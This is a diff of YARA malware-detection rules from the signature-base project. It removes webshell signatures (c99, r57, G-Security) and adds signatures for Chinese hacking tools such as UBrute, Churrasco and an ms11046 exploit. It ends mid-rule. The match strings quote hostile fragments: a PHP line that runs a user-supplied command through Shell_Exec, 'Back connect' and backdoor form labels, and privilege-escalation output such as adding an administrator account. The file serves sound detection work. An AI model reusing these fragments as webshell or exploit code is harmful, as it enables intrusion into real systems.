+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = ">[*] Safemode Mode Run</DIV>"
-		$s1 = "$file1 - $file2 - <a href=$SCRIPT_NAME?$QUERY_STRING&see=$file>$file</a><br>"
-		$s2 = "[*] Spawning Shell"
-		$s3 = "Cha0s"
+		$s1 = "IP - %d; Login - %d; Password - %d; Combination - %d" fullword ascii
+		$s2 = "IP - 0; Login - 0; Password - 0; Combination - 0" fullword ascii
+		$s3 = "Create %d IP@Loginl;Password" fullword ascii
+		$s4 = "UBrute.com" fullword ascii
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 1020KB and all of them
 }
-rule SIGNATURE_BASE_Mysql_Web_Interface_Version_0_8_Php
+rule SIGNATURE_BASE_Cookietools : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file MySQL Web Interface Version 0.8.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "90616d2d-082b-5983-a859-62d1c5b8066e"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4945-L4958"
+		description = "Chinese Hacktool Set - file CookieTools.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "893884e5-6f4c-5f67-9382-8bf1ee45a257"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L277-L294"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "36d4f34d0a22080f47bb1cb94107c60f"
-		logic_hash = "f0a20870a3240948e3ef1ad61685b00c5fc90d6098b87af9ac43ab44ccd13c9e"
+		hash = "b6a3727fe3d214f4fb03aa43fb2bc6fadc42c8be"
+		logic_hash = "7f8c59ef58a92db15d8965e54ed6e26834e268581581af2a0ff98a6f46564e7e"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "SooMin Kim"
-		$s1 = "http://popeye.snu.ac.kr/~smkim/mysql"
-		$s2 = "href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename"
-		$s3 = "<th>Type</th><th>&nbspM&nbsp</th><th>&nbspD&nbsp</th><th>unsigned</th><th>zerofi"
+		$s0 = "http://210.73.64.88/doorway/cgi-bin/getclientip.asp?IP=" fullword ascii
+		$s2 = "No data to read.$Can not bind in port range (%d - %d)" fullword wide
+		$s3 = "Connection Closed Gracefully.;Could not bind socket. Address and port are alread" wide
+		$s8 = "OnGetPasswordP" fullword ascii
+		$s12 = "http://www.chinesehack.org/" ascii
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 5000KB and 4 of them
 }
-rule SIGNATURE_BASE_Simple_Cmd_Html
+rule SIGNATURE_BASE_Update_Pcinit : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file simple_cmd.html.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "30990574-02a0-5eed-8317-847b6be13300"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4959-L4972"
+		description = "Chinese Hacktool Set - file PcInit.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "71c34049-97a2-5611-a081-21a85f8631d9"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L296-L314"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "c6381412df74dbf3bcd5a2b31522b544"
-		logic_hash = "56b5b9e5518fa8a4be8c48735e997a538b0e534ad8fd72c1419dc0e8353bbc00"
+		hash = "a6facc4453f8cd81b8c18b3b3004fa4d8e2f5344"
+		logic_hash = "ee4b17dfb0d70464669edab1b7610efa607adb2918306ae6c50130024008a169"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "<title>G-Security Webshell</title>" fullword
-		$s2 = "<input type=TEXT name=\"-cmd\" size=64 value=\"<?=$cmd?>\" " fullword
-		$s3 = "<? if($cmd != \"\") print Shell_Exec($cmd);?>" fullword
-		$s4 = "<? $cmd = $_REQUEST[\"-cmd\"];?>" fullword
+		$s1 = "\\svchost.exe" ascii
+		$s2 = "%s%08x.001" fullword ascii
+		$s3 = "Global\\ps%08x" fullword ascii
+		$s4 = "drivers\\" ascii
+		$s5 = "StrStrA" fullword ascii
+		$s6 = "StrToIntA" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 50KB and all of them
 }
-rule SIGNATURE_BASE__1_C2007_Php_Php_C100_Php
+rule SIGNATURE_BASE_Dat_Nasllib : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - from files 1.txt, c2007.php.php.txt, c100.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "00ada6a4-a32a-5184-867d-e10a8c95c41c"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4973-L4987"
+		description = "Chinese Hacktool Set - file NaslLib.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d5ce72a4-c2b0-50b2-85bb-acf0bfd354e0"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L316-L331"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6f6cb7c210bcd0f84c2ccff52850b1d673622ae49b83d614d63b5bbba7392327"
+		hash = "fb0d4263118faaeed2d68e12fab24c59953e862d"
+		logic_hash = "7d2f3c67fe78028a51ba01c88d7eb62c38fe3c918bb03eee41b6583bc464ad78"
 		score = 75
 		quality = 85
-		tags = ""
-		super_rule = 1
-		hash0 = "44542e5c3e9790815c49d5f9beffbbf2"
-		hash1 = "d089e7168373a0634e1ac18c0ee00085"
-		hash2 = "38fd7e45f9c11a37463c3ded1c76af4c"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "echo \"<b>Changing file-mode (\".$d.$f.\"), \".view_perms_color($d.$f).\" (\""
-		$s3 = "echo \"<td>&nbsp;<a href=\\\"\".$sql_surl.\"sql_act=query&sql_query=\".ur"
+		$s1 = "nessus_get_socket_from_connection: fd <%d> is closed" fullword ascii
+		$s2 = "[*] \"%s\" completed, %d/%d/%d/%d:%d:%d - %d/%d/%d/%d:%d:%d" fullword ascii
+		$s3 = "A FsSniffer backdoor seems to be running on this port%s" fullword ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 1360KB and all of them
 }
-rule SIGNATURE_BASE__Nst_Php_Php_Img_Php_Php_Nstview_Php_Php
+rule SIGNATURE_BASE_Dos_1 : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - from files nst.php.php.txt, img.php.php.txt, nstview.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "238242f5-4e57-5edb-8806-ea5e06f1f637"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4988-L5003"
+		description = "Chinese Hacktool Set - file 1.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3f1cc1b3-bce2-5a29-849e-ee7deb5e8809"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L333-L347"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b1e13f75edbbc8f9263e0e516a54330ce57190ba0b45813dad4bafeaeefa389b"
+		hash = "b554f0687a12ec3a137f321cc15e052ff219f28c"
+		logic_hash = "d4cf3e738743e5402602e045cf590b969dca2d6f7f1bdd57cc398df3392560d9"
 		score = 75
 		quality = 85
-		tags = ""
-		super_rule = 1
-		hash0 = "ddaf9f1986d17284de83a17fe5f9fd94"
-		hash1 = "17a07bb84e137b8aa60f87cd6bfab748"
-		hash2 = "4745d510fed4378e4b1730f56f25e569"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<tr><form method=post><td><font color=red><b>Back connect:</b></font></td><td><i"
-		$s1 = "$perl_proxy_scp = \"IyEvdXNyL2Jpbi9wZXJsICANCiMhL3Vzci91c2MvcGVybC81LjAwNC9iaW4v"
-		$s2 = "<tr><form method=post><td><font color=red><b>Backdoor:</b></font></td><td><input"
+		$s1 = "/churrasco/-->Usage: Churrasco.exe \"command to run\"" fullword ascii
+		$s2 = "/churrasco/-->Done, command should have ran as SYSTEM!" fullword ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
 }
-rule SIGNATURE_BASE__Network_Php_Php_Xinfo_Php_Php_Nfm_Php_Php
+rule SIGNATURE_BASE_Othertools_Servu : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - from files network.php.php.txt, xinfo.php.php.txt, nfm.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "4fd11db6-902d-5f1a-96c5-9dfcccce7488"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5004-L5018"
+		description = "Chinese Hacktool Set - file svu.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b750d090-8726-5d21-98ba-6cb050cb7174"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L349-L365"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "913ff19b6448d3b074440c2a5f85d85813fdf010d33dc57c89ba1e5db6455e11"
+		hash = "5c64e6879a9746a0d65226706e0edc7a"
+		logic_hash = "fda476bdcc0bb496331ca9f506a1221d401d8671d23f61f1b88219c688163169"
 		score = 75
 		quality = 85
-		tags = ""
-		super_rule = 1
-		hash0 = "acdbba993a5a4186fd864c5e4ea0ba4f"
-		hash1 = "2601b6fc1579f263d2f3960ce775df70"
-		hash2 = "401fbae5f10283051c39e640b77e4c26"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = ".textbox { background: White; border: 1px #000000 solid; color: #000099; font-fa"
-		$s2 = "<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''"
+		$s0 = "MZKERNEL32.DLL" fullword ascii
+		$s1 = "UpackByDwing@" fullword ascii
+		$s2 = "GetProcAddress" fullword ascii
+		$s3 = "WriteFile" fullword ascii
 
 	condition:
-		all of them
+		uint32( 0 ) == 0x454b5a4d and $s0 at 0 and filesize < 50KB and all of them
 }
-rule SIGNATURE_BASE__W_Php_Php_C99Madshell_V2_1_Php_Php_Wacking_Php_Php_Specialshell_99_Php_Php
+rule SIGNATURE_BASE_Ustrrefadd : FILE
 {
 	meta:
-		description = "Semi-Auto-generated "
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "ee1fd555-f1bc-59a5-998c-f6098de8623e"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5019-L5034"
+		description = "Chinese Hacktool Set - file ustrrefadd.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e6701e7e-bb15-5e0c-822b-3e29342e083c"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L367-L384"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a4bae5456baf0d8d894165c84d66118f2b16cfc040e299c2032eccb6a9eb4822"
+		hash = "b371b122460951e74094f3db3016264c9c8a0cfa"
+		logic_hash = "e44f180e081494e28b35b4129eb2c1817ed3e83f23d86f0d3dd4dcf27941cdf1"
 		score = 75
 		quality = 85
-		tags = ""
-		super_rule = 1
-		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
-		hash1 = "3ca5886cd54d495dc95793579611f59a"
-		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
-		hash3 = "09609851caa129e40b0d56e90dfc476c"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "echo \"<hr size=\\\"1\\\" noshade><b>Done!</b><br>Total time (secs.): \".$ft"
-		$s3 = "$fqb_log .= \"\\r\\n------------------------------------------\\r\\nDone!\\r"
+		$s0 = "E-Mail  : admin@luocong.com" fullword ascii
+		$s1 = "Homepage: http://www.luocong.com" fullword ascii
+		$s2 = ": %d  -  " fullword ascii
+		$s3 = "ustrreffix.dll" fullword ascii
+		$s5 = "Ultra String Reference plugin v%d.%02d" fullword ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 320KB and all of them
 }
-rule SIGNATURE_BASE__R577_Php_Php_Sniper_SA_Shell_Php_R57_Php_Php_R57_Shell_Php_Php_Spy_Php_Php_S_Php_Php
+rule SIGNATURE_BASE_Xscanlib : FILE
 {
 	meta:
-		description = "Semi-Auto-generated "
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "44b53124-c8b6-545b-819f-77fd65e5d61b"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5035-L5052"
+		description = "Chinese Hacktool Set - file XScanLib.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e1e2cfad-7cbb-51c3-9b55-648c47af641e"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L386-L402"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0df3e00f752f85aa1f150c01e3ef41b9a5cd3d3ce2060965992320cb3c4d87ae"
+		hash = "c5cb4f75cf241f5a9aea324783193433a42a13b0"
+		logic_hash = "ff18c527df9ff2a4d72bcc5e4905d6f42877d42536edcb13608c6e0e6773aa63"
 		score = 75
 		quality = 85
-		tags = ""
-		super_rule = 1
-		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
-		hash1 = "911195a9b7c010f61b66439d9048f400"
-		hash2 = "eddf7a8fde1e50a7f2a817ef7cece24f"
-		hash3 = "8023394542cddf8aee5dec6072ed02b5"
-		hash4 = "eed14de3907c9aa2550d95550d1a2d5f"
-		hash5 = "817671e1bdc85e04cc3440bbd9288800"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "'eng_text71'=>\"Second commands param is:\\r\\n- for CHOWN - name of new owner o"
-		$s4 = "if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult"
+		$s4 = "XScanLib.dll" fullword ascii
+		$s6 = "Ports/%s/%d" fullword ascii
+		$s8 = "DEFAULT-TCP-PORT" fullword ascii
+		$s9 = "PlugCheckTcpPort" fullword ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 360KB and all of them
 }
-rule SIGNATURE_BASE__C99Shell_V1_0_Php_Php_C99Php_Sses_Php_Php_Ctt_Sh_Php_Php
+rule SIGNATURE_BASE_Idtools_For_Winxp_Idttool : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - from files c99shell_v1.0.php.php.txt, c99php.txt, SsEs.php.php.txt, ctt_sh.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5053-L5069"
+		description = "Chinese Hacktool Set - file IdtTool.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c157d467-87f8-59d5-a3ba-e4fbeeba767d"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L404-L419"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "137f98b636ec012d7d5e687f7d24ae88e8d3261360e60a4bbc03da248cce381e"
+		hash = "ebab6e4cb7ea82c8dc1fe4154e040e241f4672c6"
+		logic_hash = "9e14db3721afaba3ea5e9767afff593bf2b137306fe673acd7926bf6efc78391"
 		score = 75
 		quality = 85
-		tags = ""
-		super_rule = 1
-		hash0 = "d8ae5819a0a2349ec552cbcf3a62c975"
-		hash1 = "9e9ae0332ada9c3797d6cee92c2ede62"
-		hash2 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
-		hash3 = "671cad517edd254352fe7e0c7c981c39"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "\"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze\""
-		$s2 = "\"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm\""
-		$s4 = "\"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo\""
+		$s2 = "IdtTool.sys" fullword ascii
+		$s4 = "Idt Tool bY tMd[CsP]" fullword wide
+		$s6 = "\\\\.\\slIdtTool" fullword ascii
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 25KB and all of them
 }
-rule SIGNATURE_BASE__R577_Php_Php_Spy_Php_Php_S_Php_Php
+rule SIGNATURE_BASE_Goodtoolset_Ms11046 : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - from files r577.php.php.txt, spy.php.php.txt, s.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "d287136c-534b-51a4-88fc-40ef9f22d910"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5070-L5084"
+		description = "Chinese Hacktool Set - file ms11046.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a4703861-02a9-5d93-b6de-c3664ca8abb9"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L421-L438"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "09892789e8dad16f9fc7c4e22525e5d0af3af401a4b2655b70f7a6856888875c"
+		hash = "f8414a374011fd239a6c6d9c6ca5851cd8936409"
+		logic_hash = "2fb36a589613f97d0c3a4da58c65352689062a8ba6d432b5f3cf3b51a7e77f8c"
 		score = 75
 		quality = 85
-		tags = ""
-		super_rule = 1
-		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
-		hash1 = "eed14de3907c9aa2550d95550d1a2d5f"
-		hash2 = "817671e1bdc85e04cc3440bbd9288800"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "echo $te.\"<div align=center><textarea cols=35 name=db_query>\".(!empty($_POST['"
-		$s3 = "echo sr(45,\"<b>\".$lang[$language.'_text80'].$arrow.\"</b>\",\"<select name=db>"
+		$s1 = "[*] Token system command" fullword ascii
+		$s2 = "[*] command add user 90sec 90sec" fullword ascii
+		$s3 = "[*] Add to Administrators success" fullword ascii
+		$s4 = "[*] User has been successfully added" fullword ascii
+		$s5 = "Program: %s%s%s%s%s%s%s%s%s%s%s" fullword ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 840KB and 2 of them
 }
-rule SIGNATURE_BASE_Webshell_C99_Generic
+rule SIGNATURE_BASE_Cmdshell32 : FILE
 {
 	meta:
-		description = "Semi-Auto-generated "
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5085-L5105"
+		description = "Chinese Hacktool Set - file Cmdshell32.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f1dfb5a1-4292-5895-8310-913cfdf4d9d0"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L440-L455"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "422bc3a0d9b04b1e37ad954faacb1ec7841fe529c1eb19634bdbfe83da374c73"
+		hash = "3c41116d20e06dcb179e7346901c1c11cd81c596"
+		logic_hash = "cfe3d72d33d7a3c2b70d4fa0767a921c1cfcd360b2094af40b067789cace95af"
 		score = 75
 		quality = 85
-		tags = ""
-		super_rule = 1
-		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
-		hash1 = "3ca5886cd54d495dc95793579611f59a"
-		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
-		hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
-		hash4 = "9e9ae0332ada9c3797d6cee92c2ede62"
-		hash5 = "09609851caa129e40b0d56e90dfc476c"
-		hash6 = "671cad517edd254352fe7e0c7c981c39"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "  if ($copy_unset) {foreach($sess_data[\"copy\"] as $k=>$v) {unset($sess_data[\""
-		$s1 = "  if (file_exists($mkfile)) {echo \"<b>Make File \\\"\".htmlspecialchars($mkfile"
-		$s2 = "  echo \"<center><b>MySQL \".mysql_get_server_info().\" (proto v.\".mysql_get_pr"
-		$s3 = "  elseif (!fopen($mkfile,\"w\")) {echo \"<b>Make File \\\"\".htmlspecialchars($m"
+		$s1 = "cmdshell.exe" fullword wide
+		$s2 = "cmdshell" fullword ascii
+		$s3 = "[Root@CmdShell ~]#" fullword wide
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 62KB and all of them
 }
-rule SIGNATURE_BASE__W_Php_Php_C99Madshell_V2_1_Php_Php_Wacking_Php_Php_C99Shell_V1_0_Php_Php_C99Php_Specialshell_99_Php_Php
+rule SIGNATURE_BASE_Sniffer_Analyzer_Ssclone_1210_Full_Version : FILE
 {
 	meta:
-		description = "Semi-Auto-generated "
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5106-L5123"
+		description = "Chinese Hacktool Set - file Sniffer analyzer SSClone 1210 full version.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "69dac4bf-483d-5888-a748-1a52cf372066"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L457-L473"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b133cf947476a1c94ed90b5cd3757ca8aa429be4284d75664625896d9cfa687f"
+		hash = "6882125babb60bd0a7b2f1943a40b965b7a03d4e"
+		logic_hash = "982a213a106794e2cddb6148b3d3a119ae17fc318ad03237da1018e1859523d7"
 		score = 75
 		quality = 85
-		tags = ""
-		super_rule = 1
-		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
-		hash1 = "3ca5886cd54d495dc95793579611f59a"
-		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
-		hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
-		hash4 = "9e9ae0332ada9c3797d6cee92c2ede62"
-		hash5 = "09609851caa129e40b0d56e90dfc476c"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "$sess_data[\"cut\"] = array(); c99_s"
-		$s3 = "if ((!eregi(\"http://\",$uploadurl)) and (!eregi(\"https://\",$uploadurl))"
+		$s0 = "http://www.vip80000.com/hot/index.html" fullword ascii
+		$s1 = "GetConnectString" fullword ascii
+		$s2 = "CnCerT.Safe.SSClone.dll" fullword ascii
+		$s3 = "(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG" fullword ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 3580KB and all of them
 }
-rule SIGNATURE_BASE__W_Php_Php_Wacking_Php_Php_Specialshell_99_Php_Php
+rule SIGNATURE_BASE_X64_Klock : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - from files w.php.php.txt, wacking.php.php.txt, SpecialShell_99.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "c01ad0e5-1aff-5128-9d0c-5d0967532a4b"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5124-L5138"
+		description = "Chinese Hacktool Set - file klock.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7065a4fb-c867-5a94-b6bb-5b60085bea15"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L475-L491"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7bdaebfb093b58a2fd33b4bbeea8465d0f724383b4855eb521a3e339ee153781"
+		hash = "44825e848bc3abdb6f31d0a49725bb6f498e9ccc"
+		logic_hash = "3fe00c08607d20daa055db2f551009ff1c447f1a651d4a78aba91621d53424f5"
 		score = 75
 		quality = 85
-		tags = ""
-		super_rule = 1
-		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
-		hash1 = "9c5bb5e3a46ec28039e8986324e42792"
